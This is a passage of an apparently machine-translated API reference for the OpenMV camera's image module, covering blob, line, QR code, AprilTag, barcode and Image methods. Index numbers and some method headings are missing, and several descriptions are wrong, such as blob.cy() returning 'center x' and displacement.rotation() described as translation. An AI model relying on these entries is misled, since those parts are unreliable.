LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_max()\n\nReturns the maximum value (0-255) (int) of L in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_lq()\n\nReturns the lower quartile (0-255) (int) of L in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_uq()\n\nReturns the upper quartile (0-255) (int) of L in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_mean()\n\nReturns the mean (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_median()\n\nReturns the median (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_mode()\n\nReturns the value of A (0-255) (int) in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_stdev()\n\nReturns the standard deviation value (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_min()\n\nReturns the minimum value (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_max()\n\nReturns the maximum value (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_lq()\n\nReturns the lower quartile (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_uq()\n\nReturns the upper quartile (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_mean()\n\nReturns the mean (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_median()\n\nReturns the median (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_mode()\n\nReturns the value of B (0-255) (int) in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_stdev()\n\nReturns the standard deviation (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_min()\n\nReturns the minimum value (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_max()\n\nReturns the maximum value (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_lq()\n\nReturns the lower quartile (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_uq()\n\nReturns the upper quartile (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n## 9. Blob class – color block object\n\nThe patch object is returned by `image.find_blobs`.\n\n### 9.1. Constructor\n\nClass image.blob\n\nCall the image.find_blobs() function to create this object.\n\n### 9.2. 方法\n\n#### blob.rect()\n\nReturns a rectangular tuple (x, y, w, h) for other image methods such as image.draw_rectangle of the color block bounding box.\n\n#### blob.x()\n\nReturns the x coordinate (int) of the bounding box of the patch.\n\nYou can also get this value via index .\n\n#### blob.y()\n\nReturns the y coordinate (int) of the bounding box of the patch.\n\nYou can also get this value via index .\n\n#### blob.w()\n\nReturns the w coordinate (int) of the bounding box of the patch.\n\nYou can also get this value via index .\n\n#### blob.h()\n\nReturns the h coordinate (int) of the bounding box of the patch.\n\nYou can also get this value via index .\n\n#### blob.pixels()\n\nReturns the number of pixels subordinate to a part of the int.\n\nYou can also get this value via index .\n\n#### blob.cx()\n\nReturns the center x position of the color block (int).\n\nYou can also get this value via index .\n\n#### blob.cy()\n\nReturns the center x position of the color block (int).\n\nYou can also get this value via index .\n\n#### blob.rotation()\n\nReturns the rotation of the patch (in radians). If the color block is similar to a pencil or pen, then this value is a unique value between 0-180. If the color block is round, then this value has no effect. If this color block is completely symmetrical, you can only get a 0-360 degree rotation.\n\nYou can also get this value via index .\n\n#### blob.code()\n\nReturns a 16-bit binary number with one bit set for each color threshold, which is part of the color block. For example, if you look for three color thresholds via image.find_blobs, this color block can be set to 0/1/2 digits. Note: You can only set one bit per color block unless you call image.find_blobs with merge=True . Then multiple color patches with different color thresholds can be merged together. You can also use this method and multiple thresholds to implement color code tracking.\n\nYou can also get this value via index .\n\n#### blob.count()\n\nReturns the number of multiple patches that are merged into this patch. This number is not 1 only if you call image.find_blobs with merge=True.\n\nYou can also get this value via index .\n\n#### blob.area()\n\nReturns the border area around the patch (w * h)\n\n#### blob.density()\n\nReturns the density ratio of this patch. This is the number of pixels in the bounding box area of ​​the patch. In general, a lower density ratio means that the object is not locked well.\n\n## 10. Line Class – Straight Line Object\n\nLine objects are returned by `image.find_lines` , `image.find_line_segments` or `image.get_regression`.\n\n### 10.1. Constructor\n\nClass image.line\n\nCall the image.find_lines(), image.find_line_segments(), or image.get_regression() function to create this object.\n\n### 10.2. 方法\n\n#### line.line()\n\nReturns a line tuple (x1, y1, x2, y2) for use with other image methods such as image.draw_line .\n\n#### line.x1()\n\nReturns the p1 vertex x coordinate component of the line.\n\nYou can also get this value via index .\n\n#### line.y1()\n\nReturns the p1 y component of the line.\n\nYou can also get this value via index .\n\n#### line.x2()\n\nReturns the p2 x component of the line.\n\nYou can also get this value via index .\n\n#### line.y2()\n\nReturns the p2 y component of the line.\n\nYou can also get this value via index .\n\n#### line.length()\n\nReturns the length of the line ie sqrt(((x2-x1)^2) + ((y2-y1)^2).\n\nYou can also get this value via index .\n\n#### line.magnitude()\n\nReturns the length of the line after the Hough transform.\n\nYou can also get this value via index .\n\n#### line.theta()\n\nReturns the angle of the line after the Hough transform (0-179 degrees).\n\nYou can also get this value via index .\n\n#### line.rho()\n\nReturns the p value of the line after the Hough transform.\n\nYou can also get this value via index .\n\n## 11. CircleClass - Round Object\n\nThe circular object is returned by `image.find_circles`.\n\n### 11.1. Constructor\n\nClass image.circle\n\nCall the image.find_circles() function to create this object.\n\n### 11.2. 方法\n\n#### circle.x()\n\nReturns the x position of the circle.\n\nYou can also get this value via index .\n\n#### circle.y()\n\nReturns the y position of the circle.\n\nYou can also get this value via index .\n\n#### circle.r()\n\nReturns the radius of the circle.\n\nYou can also get this value via index .\n\n#### circle.magnitude()\n\nReturns the size of the circle.\n\nYou can also get this value via index .\n\n## 12. Rect class – rectangular object\n\nThe rectangle object is returned by `image.find_rects`.\n\n### 12.1. Constructor\n\nClass image.rect\n\nCall the image.find_rects() function to create this object.\n\n### 12.2. 方法\n\n#### rect.corners()\n\nReturns a list of four tuples (x, y) consisting of the four corners of a rectangular object. The four corners are usually returned in a clockwise order starting from the upper left corner.\n\n#### rect.rect()\n\nReturns a rectangular tuple (x, y, w, h) for other image methods such as image.draw_rectangle of the bounding box of the rectangle.\n\n#### rect.x()\n\nReturns the x position of the top left corner of the rectangle.\n\nYou can also get this value via index .\n\n#### rect.y()\n\nReturns the y position of the top left corner of the rectangle.\n\nYou can also get this value via index .\n\n#### rect.w()\n\nReturns the width of the rectangle.\n\nYou can also get this value via index .\n\n#### rect.h()\n\nReturns the height of the rectangle.\n\nYou can also get this value via index .\n\n#### rect.magnitude()\n\nReturns the size of the rectangle.\n\nYou can also get this value via index .\n\n## 13. QRCode Class – QR Code Object\n\nThe QR code object is returned by `image.find_qrcodes`.\n\n### 13.1. Constructor\n\nClass image.qrcode\n\nCall the image.find_qrcodes() function to create this object.\n\n### 13.2. 方法\n\n#### qrcode.corners()\n\nReturns a list of four tuples (x, y) consisting of the four corners of the object. The four corners are usually returned in a clockwise order starting from the upper left corner.\n\n#### qrcode.rect()\n\nReturns a rectangular tuple (x, y, w, h) for other image methods such as image.draw_rectangle of the bounding box of the QR code.\n\n#### qrcode.x()\n\nReturns the x coordinate (int) of the bounding box of the QR code.\n\nYou can also get this value via index .\n\n#### qrcode.y()\n\nReturns the y coordinate (int) of the bounding box of the QR code.\n\nYou can also get this value via index .\n\n#### qrcode.w()\n\nReturns the w coordinate (int) of the bounding box of the QR code.\n\nYou can also get this value via index .\n\n#### qrcode.h()\n\nReturns the h coordinate (int) of the bounding box of the QR code.\n\nYou can also get this value via index .\n\nReturns a string of the QR code payload, such as a URL.\n\nYou can also get this value via index .\n\n#### qrcode.version()\n\nReturns the version number (int) of the QR code.\n\nYou can also get this value via index .\n\n#### qrcode.ecc_level()\n\nReturns the ECC level (int) of the QR code.\n\nYou can also get this value via index .\n\nReturns the mask (int) of the QR code.\n\nYou can also get this value via index .\n\n#### qrcode.data_type()\n\nReturns the data type of the QR code.\n\nYou can also get this value via index .\n\n#### qrcode.eci()\n\nReturns the ECI of the QR code. The ECI stores the code for storing the data bytes in the QR code. If you want to process a QR code that contains more than standard ASCII text, you need to look at this value.\n\nYou can also get this value via index .\n\n#### qrcode.is_numeric()\n\nReturns True if the data type of the QR code is numeric.\n\n#### qrcode.is_alphanumeric()\n\nReturns True if the data type of the QR code is alphanumeric.\n\n#### qrcode.is_binary()\n\nReturns True if the data type of the QR code is binary. If you are dealing with all types of text carefully, you need to check if eci is True to determine the text encoding of the data. Usually it's just standard ASCII, but it could also be UTF8 with two byte characters.\n\n#### qrcode.is_kanji()\n\nReturns True if the data type of the QR code is Japanese Kanji. When set to True, you need to decode the string yourself, because the Japanese character is 10 digits per character, and MicroPython does not support parsing such text.\n\n## 14. AprilTag类 – AprilTag object\n\nThe AprilTag object is returned by `image.find_apriltags`.\n\n### 14.1. Constructor\n\nClass image.apriltag\n\nCall the image.find_apriltags() function to create this object.\n\n### 14.2. 方法\n\n#### apriltag.corners()\n\nReturns a list of four tuples (x, y) consisting of the four corners of the object. The four corners are usually returned in a clockwise order starting from the upper left corner.\n\n#### apriltag.rect()\n\nReturns a rectangular tuple (x, y, w, h) for other image methods such as image.draw_rectangle of the AprilTag bounding box.\n\n#### apriltag.x()\n\nReturns the x coordinate (int) of the AprilTag bounding box.\n\nYou can also get this value via index .\n\n#### apriltag.y()\n\nReturns the y coordinate (int) of the AprilTag bounding box.\n\nYou can also get this value via index .\n\n#### apriltag.w()\n\nReturns the w coordinate (int) of the AprilTag bounding box.\n\nYou can also get this value via index .\n\n#### apriltag.h()\n\nReturns the h coordinate (int) of the AprilTag bounding box.\n\nYou can also get this value via index .\n\n#### apriltag.id()\n\nReturns the numeric ID of the AprilTag.\n\nTAG16H5 -> 0 to 29 TAG25H7 -> 0 to 241 TAG25H9 -> 0 to 34 TAG36H10 -> 0 to 2319 TAG36H11 -> 0 to 586 ARTOOLKIT -> 0 to 511 You can also get this value via index .\n\n#### apriltag.family()\n\nimage.TAG16H5 image.TAG25H7 image.TAG25H9 image.TAG36H10 image.TAG36H11 image.ARTOOLKIT You can also get this value via index .\n\n#### apriltag.cx()\n\nReturns the center x position (int) of the AprilTag.\n\nYou can also get this value via index .\n\n#### apriltag.cy()\n\nReturns the center y position (int) of the AprilTag.\n\nYou can also get this value via index .\n\n#### apriltag.rotation()\n\nReturns the curl (int) of the AprilTag in radians.\n\nYou can also get this value via index .\n\n#### apriltag.decision_margin()\n\nReturns the color saturation of the AprilTag match (values ​​0.0 - 1.0), where 1.0 is optimal.\n\nYou can also get this value via index .\n\n#### apriltag.hamming()\n\nReturns the acceptable digit error value for the AprilTag.\n\nTAG16H5 -> accepts up to 0 bit errors TAG25H7 -> accepts up to 1 bit error TAG25H9 -> accepts up to 3 bit errors TAG36H10 -> accepts up to 3 bit errors TAG36H11 -> accepts up to 4 errors ARTOOLKIT -> accepts up to 0 bit errors You can also get this value via index .\n\n#### apriltag.goodness()\n\nReturns the color saturation of the AprilTag image (value 0.0 - 1.0), where 1.0 is optimal.\n\nCurrently this value is usually 0.0. In the future, we can enable a feature called \"tag refinement\" to achieve detection of smaller AprilTag. However, this feature now reduces the frame rate below 1 FPS.\n\nYou can also get this value via index .\n\n#### apriltag.x_translation()\n\nReturns the transformation from the x direction of the camera. The unit of distance is unknown.\n\nThis method is useful for determining the position of the AprilTag away from the camera. However, the size of the AprilTag and the factors you use will affect the determination of the X unit ownership. For ease of use, we recommend that you use a lookup table to convert the output of this method into information that is useful to your application.\n\nNote: The direction here is from left to right.\n\nYou can also get this value via index .\n\n#### apriltag.y_translation()\n\nReturns the transformation from the y direction of the camera, the unit of distance is unknown.\n\nThis method is useful for determining the position of the AprilTag away from the camera. However, the size of the AprilTag and the factors you use will affect the determination of the Y unit ownership. For ease of use, we recommend that you use a lookup table to convert the output of this method into information that is useful to your application.\n\nNote: The direction here is from top to bottom.\n\nYou can also get this value via index .\n\n#### apriltag.z_translation()\n\nReturns the transformation from the camera's z direction, the unit of distance is unknown.\n\nThis method is useful for determining the position of the AprilTag away from the camera. However, factors such as the size of the AprilTag and the lens you are using will affect the determination of the Z-unit attribution. For ease of use, we recommend that you use a lookup table to convert the output of this method into information that is useful to your application.\n\nNote: The direction here is from front to back.\n\nYou can also get this value via index .\n\n#### apriltag.x_rotation()\n\nReturns the curl of the AprilTag in radians on the X plane. Example: Visually see the AprilTag and move the camera from left to right.\n\nYou can also get this value via index .\n\n#### apriltag.y_rotation()\n\nReturns the curl of the AprilTag in radians on the Y plane. Example: Visualize the AprilTag and move the camera from top to bottom.\n\nYou can also get this value via index .\n\n#### apriltag.z_rotation()\n\nReturns the curl of the AprilTag in radians on the Z plane. Example: Visualize the AprilTag and rotate the camera.\n\nNote: This is just a renamed version of apriltag.rotation().\n\nYou can also get this value via index .\n\n## 15. DataMatrix Class – Data Matrix Object\n\nThe data matrix object is returned by `image.find_datamatrices`.\n\n## 16. Constructor\n\nClass image.datamatrix\n\nCall the image.find_datamatrices() function to create this object.\n\n### 16.1. 方法\n\n#### datamatrix.corners()\n\nReturns a list of four tuples (x, y) consisting of the four corners of the object. The four corners are usually returned in a clockwise order starting from the upper left corner.\n\n#### datamatrix.rect()\n\nReturns a rectangular tuple (x, y, w, h) for other image methods such as image.draw_rectangle of the bounding box of the data matrix.\n\n#### datamatrix.x()\n\nReturns the x coordinate (int) of the bounding box of the data matrix.\n\nYou can also get this value via index .\n\n#### datamatrix.y()\n\nReturns the y coordinate (int) of the bounding box of the data matrix.\n\nYou can also get this value via index .\n\n#### datamatrix.w()\n\nReturns the w width of the bounding box of the data matrix.\n\nYou can also get this value via index .\n\n#### datamatrix.h()\n\nReturns the h height of the bounding box of the data matrix.\n\nYou can also get this value via index .\n\nReturns a string of payloads for the data matrix. Example: String.\n\nYou can also get this value via index .\n\n#### datamatrix.rotation()\n\nReturns the curl (float) of the data matrix in radians.\n\nYou can also get this value via index .\n\n#### datamatrix.rows()\n\nReturns the number of rows (int) of the data matrix.\n\nYou can also get this value via index .\n\n#### datamatrix.columns()\n\nReturns the number of columns (int) of the data matrix.\n\nYou can also get this value via index .\n\n#### datamatrix.capacity()\n\nReturns the number of characters this data matrix can hold.\n\nYou can also get this value via index .\n\nReturns the number of unused characters in this data matrix.\n\nYou can also get this value via index .\n\n## 17. BarCode Class – Barcode Object\n\nThe barcode object is returned by image.find_barcodes.\n\n## 18. Constructor\n\nClass image.barcode\n\nCall the image.find_barcodes() function to create this object.\n\n### 18.1. 方法\n\n#### barcode.corners()\n\nReturns a list of four tuples (x, y) consisting of the four corners of the object. The four corners are usually returned in a clockwise order starting from the upper left corner.\n\n#### barcode.rect()\n\nReturns a rectangular tuple (x, y, w, h) for other image methods such as image.draw_rectangle of the bounding box of the data matrix.\n\n#### barcode.x()\n\nReturns the x coordinate (int) of the bounding box of the barcode.\n\nYou can also get this value via index .\n\n#### barcode.y()\n\nReturns the y coordinate (int) of the bounding box of the barcode.\n\nYou can also get this value via index .\n\n#### barcode.w()\n\nReturns the w width (int) of the bounding box of the barcode.\n\nYou can also get this value via index .\n\n#### barcode.h()\n\nReturns the h height (int) of the bounding box of the barcode.\n\nYou can also get this value via index .\n\nReturns a string of the payload of the barcode. Example: Quantity.\n\nYou can also get this value via index .\n\n#### barcode.type()\n\nReturns the enumerated type (int) of the barcode.\n\nYou can also get this value via index .\n\nimage.EAN2 image.EAN5 image.EAN8 image.UPCE image.ISBN10 image.UPCA image.EAN13 image.ISBN13 image.I25 image.DATABAR image.DATABAR_EXP image.CODABAR image.CODE39 image.PDF417 - Enable in the future (e.g. is not working properly now). image.CODE93 image.CODE128\n\n#### barcode.rotation()\n\nReturns the curl (floating point) of the barcode in radians.\n\nYou can also get this value via index .\n\n#### barcode.quality()\n\nReturns the number of times the barcode was detected in the image (int).\n\nWhen scanning a barcode, each new scan line can decode the same barcode. Each time this process is performed, the value of the barcode will increase.\n\nYou can also get this value via index .\n\n## 19. Displacement class – displacement object\n\nThe displacement object is returned by image.find_displacement.\n\n### 19.1. Constructor\n\nClass image.displacement\n\nCall the image.find_displacement() function to create this object.\n\n### 19.2. 方法\n\n#### displacement.x_translation()\n\nReturns an x ​​translation pixel between two images. This is a precise subpixel, so it is a floating point number.\n\nYou can also get this value via index .\n\n#### displacement.y_translation()\n\nReturns the y translation pixel between the two images. This is a precise subpixel, so it is a floating point number.\n\nYou can also get this value via index .\n\n#### displacement.rotation()\n\nReturns the z translation pixel between the two images. This is a precise subpixel, so it is a floating point number.\n\nYou can also get this value via index .\n\n#### displacement.scale()\n\nReturns the arc of rotation between two images.\n\nYou can also get this value via index .\n\n#### displacement.response()\n\nReturns the quality of the displacement match between the two images. Range 0-1. A displacement object with a response of less than 0.1 may be noise.\n\nYou can also get this value via index .\n\n## 20. Kptmatch class – feature point object\n\nThe feature point object is returned by `image.match_descriptor`.\n\n### 20.1. Constructor\n\nClass image.kptmatch\n\nPlease call the image.match_descriptor() function to create this object.\n\n### 20.2. 方法\n\n#### kptmatch.rect()\n\nReturns a rectangular tuple (x, y, w, h) for other image methods such as image.draw_rectangle of the bounding box of the feature point.\n\n#### kptmatch.cx()\n\nReturns the center x position (int) of the feature point.\n\nYou can also get this value via index .\n\n#### kptmatch.cy()\n\nReturns the center y position (int) of the feature point.\n\nYou can also get this value via index .\n\n#### kptmatch.x()\n\nReturns the x coordinate (int) of the bounding box of the feature point.\n\nYou can also get this value via index .\n\n#### kptmatch.y()\n\nReturns the y coordinate (int) of the bounding box of the feature point.\n\nYou can also get this value via index .\n\n#### kptmatch.w()\n\nReturns the w width (int) of the feature point bounding box.\n\nYou can also get this value via index .\n\n#### kptmatch.h()\n\nReturns the h height (int) of the feature point bounding box.\n\nYou can also get this value via index .\n\n#### kptmatch.count()\n\nReturns the number of matching feature points (int).\n\nYou can also get this value via index .\n\n#### kptmatch.theta()\n\nReturns the curl of the estimated feature point (int).\n\nYou can also get this value via index .\n\n#### kptmatch.match()\n\nReturns a list of (x,y) tuples that match the key.\n\nYou can also get this value via index .\n\n## 21. ImageWriterClass – ImageWriter Object\n\nThe ImageWriter object allows you to quickly write uncompressed images to disk.\n\n### 21.1. Constructor\n\nClass image.ImageWriter(path)\n\nCreate an ImageWriter object and you can write uncompressed images to disk in a simple file format for OpenMV Cams. The uncompressed image can then be re-read using ImageReader.\n\n### 21.2. method\n\n#### imagewriter.size()\n\nReturns the size of the file being written.\n\nWrite an image to disk. Because the image is not compressed, it performs quickly but takes up a lot of disk space.\n\n#### imagewriter.close()\n\nClose the image stream file. You must close the file or the file will be corrupted.\n\nThe ImageReader object allows you to quickly read uncompressed images from disk.\n\n### 22.1. Constructor\n\nCreate an ImageReader object to play back the image data written by the ImageWriter object. Frames played back by the ImageWriter object are played back under the same FPS as when writing to disk.\n\n### 22.2. method\n\nReturns the size of the file being read.\n\nImagereader.next_frame([copy_to_fb=True, loop=True]) Returns an image object from a file written by ImageWriter. If copy_to_fb is True, the image object will be loaded directly into the frame buffer. Otherwise the image object will be placed in the heap. Note: Unless the image is small, the heap may not have enough space to store the image object. If loop is True, playback will resume after the last image of the stream has been read. Otherwise, this method will return None after all frames have been read.\n\nNote: imagereader.next_frame attempts to limit the playback speed by pausing playback after reading the frame to match the speed of the frame recording. Otherwise, this method will play all images at a speed of 200+FPS.\n\nClose the file being read. You need to do this to prevent the imagereader object from being damaged. However, since it is a read-only file, the file will not be damaged when it is not closed.\n\n## 23. ImageClass - Image Object\n\nImage objects are the basic objects of machine vision operations.\n\n### 23.1. Constructor\n\nClass image.Image(path[, copy_to_fb=False])\n\nCreate a new image object from the file in path.\n\nSupport image files in bmp/pgm/ppm/jpg/jpeg format.\n\nIf copy_to_fb is True, the image will be loaded directly into the framebuffer and you can load large images. If False, the image will be loaded into the MicroPython heap, which is much smaller than the frame buffer.\n\nIn OpenMV Cam M4, if copy_to_fb is False, you should try to keep the image size below 8KB. If True, the image can be up to 160KB. In OpenMV Cam M7, if copy_to_fb is False, you should try to keep the image size below 16KB. If True, the image can be up to 320KB. The image supports the \"[]\" notation. Let image[index] = 8/16-bit value to assign image pixels or image[index] and get an image pixel. If it is a grayscale image of 16-bit RGB565 value for RGB image, this pixel is 8 Bit.\n\nFor JPEG images, \"[]\" gives you access to JPEG image patches in the form of compressed section arrays. Since JPEG images are in the form of compressed byte streams, reading and writing of data sets is opaque.\n\nThe image also supports read buffer operations. You can use the image as a section array object and enter the image into all types of MicroPython functions. If you want to transfer an image, you can pass it to the UART / SPI / I2C write function for automatic transfer.\n\n### 23.2. method\n\n#### image.width()\n\nReturns the width of the image in pixels.\n\n#### image.height()\n\nReturns the height of the image in pixels.\n\n#### image.format()\n\nReturns sensor.GRAYSCALE for grayscale images, sensor.RGB565 for RGB images, and sensor.JPEG for JPEG images.\n\n#### image.size()\n\nReturns the image size in bytes.\n\n#### image.get_pixel(x, y[, rgbtuple])\n\nGrayscale: Returns the grayscale pixel value at the (x, y) position.\n\nRGB565l: Returns the RGB888 pixel tuple (r, g, b) at the (x, y) position.\n\nBayer image: Returns the pixel value at the (x, y) position.\n\nCompressed images are not supported.\n\nimage.get_pixel() and `image.set_pixel()` are the only ways you can manipulate Bayer mode images. The Bayer pattern image is a text image. For even rows, where the pixels in the image are R/G/R/G/ and so on. For odd lines, where the pixels in the image are G/B/G/B/etc. Each pixel is 8 bits.\n\n#### image.set_pixel(x, y, pixel)\n\nGrayscale: Set the pixel at the (x, y) position to the grayscale value pixel .\n\nRGB image: Set the pixel at the (x, y) position to RGB888 tuple (r, g, b) pixel .\n\nCompressed images are not supported.\n\nimage.get_pixel() and `image.set_pixel()` are the only ways you can manipulate Bayer mode images. The Bayer pattern image is a text image. For even rows, where the pixels in the image are R/G/R/G/ and so on. For odd lines, where the pixels in the image are G/B/G/B/etc. Each pixel is 8 bits.\n\n#### image.mean_pool(x_div, y_div)\n\nFind the average of the x_div * y_div squares in the image and return a modified image consisting of the average of each square.\n\nThis method allows you to quickly reduce the image on the original image.\n\nCompressed images and bayer images are not supported.\n\n#### image.mean_pooled(x_div, y_div)\n\nFind the average of the x_div * y_div squares in the image and return a new image consisting of the average of each square.\n\nThis method allows you to create a reduced copy of the image.\n\nCompressed images and bayer images are not supported.\n\n#### image.midpoint_pool(x_div, y_div[, bias=0.5])\n\nFinds the midpoint value of the x_div * y_div square in the image and returns a modified image consisting of the midpoint values ​​of each square.\n\nBias is 0.0 to return the minimum value for each region, and `bias` is 1.0 to return the maximum value for each region.\n\nThis method allows you to quickly reduce the image on the original image.\n\nCompressed images and bayer images are not supported.\n\n#### image.midpoint_pooled(x_div, y_div[, bias=0.5])\n\nFinds the midpoint value of the x_div * y_div square in the image and returns a new image consisting of the midpoint values ​​of each square.\n\nBias is 0.0 to return the minimum value for each region, and `bias` is 1.0 to return the maximum value for each region.\n\nThis method allows you to create a reduced copy of the image.\n\nCompressed images and bayer images are not supported.\n\n#### image.to_grayscale([copy=False])\n\nConvert the image to a grayscale image. This method also modifies the base image pixels and changes the image size in bytes, so it can only be done on grayscale images or RGB565 images. Otherwise copy must be True to create a new modified image on the heap.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.to_rgb565([copy=False])\n\nConvert an image to a color image. This method also modifies the base image pixels and changes the image size in bytes, so it can only be done on RGB565 images. Otherwise copy must be True to create a new modified image on the heap.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.to_rainbow([copy=False])\n\nConvert an image to a rainbow image. This method also modifies the base image pixels and changes the image size in bytes, so it can only be done on RGB565 images. Otherwise copy must be True to create a new modified image on the heap.\n\nA rainbow image is a color image that has a unique color value for each 8-bit mask grayscale illumination value in the image. For example, it provides a heat map color for a thermal image.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.compress([quality=50])\n\nJPEG properly compresses the image. Using this method to use a higher quality compression ratio is at the expense of destroying the original image compared to the compressed save heap space.\n\nQuality is the compression quality (0-100) (int).\n\n#### image.compress_for_ide([quality=50])\n\nJPEG properly compresses the image. Using this method to use a higher quality compression ratio is at the expense of destroying the original image compared to the compressed save heap space.\n\nThis method compresses the image and then formats the JPEG data by encoding each 6 bits into a byte between 128 and 191 and converts it to OpenMV IDE for display. This step is done to prevent JPEG data from being mistaken for other text data in the byte stream.\n\nYou need to use this method to format the image data for display in the terminal window created by Open Terminal in OpenMV IDE.\n\nQuality is the compression quality (0-100) (int).\n\n#### image.compressed([quality=50])\n\nReturns a JPEG compressed image - the original image is unprocessed. However, this method requires a large allocation of heap space, so image compression quality and image resolution must be low.\n\nQuality is the compression quality (0-100) (int).\n\n#### image.compressed_for_ide([quality=50])\n\nReturns a JPEG compressed image - the original image is unprocessed. However, this method requires a large allocation of heap space, so image compression quality and image resolution must be low.\n\nThis method compresses the image and then formats the JPEG data by encoding each 6 bits into a byte between 128 and 191 and converts it to OpenMV IDE for display. This step is done to prevent JPEG data from being mistaken for other text data in the byte stream.\n\nYou need to use this method to format the image data for display in the terminal window created by Open Terminal in OpenMV IDE.\n\nQuality is the compression quality (0-100) (int).\n\n#### image.copy([roi[, copy_to_fb=False]])\n\nCreate a copy of the image object.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI copies the image rectangle of the entire image. But this does not apply to JPEG images.\n\nRemember that the image copy is stored in the MicroPython heap instead of the frame buffer. Again, you need to keep the image copy size below 8KB (OpenMV) or below 16KB (OpenMV Cam M7). If you want to use a copy operation to use all the heap space, this function will get an exception. An oversized image can easily trigger an exception.\n\nIf copy_to_fb is True, this method replaces the framebuffer with an image. The frame buffer has much larger space than the heap and can accommodate large images.\n\n#### image.save(path[, roi[, quality=50]])\n\nSave a copy of the image to the file system in path.\n\nSupport image files in bmp/pgm/ppm/jpg/jpeg format. Note: You cannot save a compressed image in jpeg format to an uncompressed format.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI copies the image rectangle of the entire image. But this does not apply to JPEG images.\n\nQuality refers to the JPEG compression quality that saves the image to JPEG format when the image has not been compressed.\n\n#### image.clear()\n\nSet all pixels in the image to zero (very fast).\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images are not supported.\n\n#### image.draw_line(x0, y0, x1, y1[, color[, thickness=1]])\n\nDraw a line from (x0, y0) to (x1, y1) on the image. You can pass x0, y0, x1, y1 individually or to a tuple (x0, y0, x1, y1).\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nThickness The thickness of the control line.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_rectangle(x, y, w, h[, color[, thickness=1[, fill=False]]])\n\nDraw a rectangle on the image. You can pass x, y, w, h alone or as a tuple (x, y, w, h).\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nThickness The thickness of the control line.\n\nSet fill to True to fill the rectangle.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_circle(x, y, radius[, color[, thickness=1[, fill=False]]])\n\nDraw a circle on the image. You can pass x, y, radius alone or as a tuple (x, y, radius).\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nThickness The thickness of the control line.\n\nSet fill to True to fill the circle.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_string(x, y, text[, color[, scale=1[, x_spacing=0[, y_spacing=0[, mono_space=True]]]])\n\nDraw 8x10 text from the (x, y) position in the image. You can pass x, y alone or as a tuple (x, y).\n\nText is a string that is written to the image. The \\n, \\r, and \\r\\n terminators move the cursor to the next line.\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nYou can increase the scale to increase the size of the text on the image.\n\nOnly integer values ​​(for example, 1/2/3 / etc).\n\nX_spacing allows you to add (if positive) or subtract (if negative) x pixels between characters to set the character spacing.\n\nY_spacing allows you to add (if positive) or subtract (if negative) y pixels between characters to set the line spacing.\n\nMono_space defaults to True, which forces the text spacing to be fixed. For big text, this looks bad. Setting False to get a non-fixed width of character spacing looks much better.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_cross(x, y[, color[, size=5[, thickness=1]]])\n\nDraw a cross on the image. You can pass x, y alone or as a tuple (x, y).\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nSize Controls the extension of the crosshair.\n\nThickness Controls the pixel thickness of the edge.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_arrow(x0, y0, x1, y1[, color[, thickness=1]])\n\nDraw an arrow from (x0, y0) to (x1, y1) on the image. You can pass x0, y0, x1, y1 individually or to a tuple (x0, y0, x1, y1).\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nThickness The thickness of the control line.\n\nReturns an image object so that you can use the . notation to call another 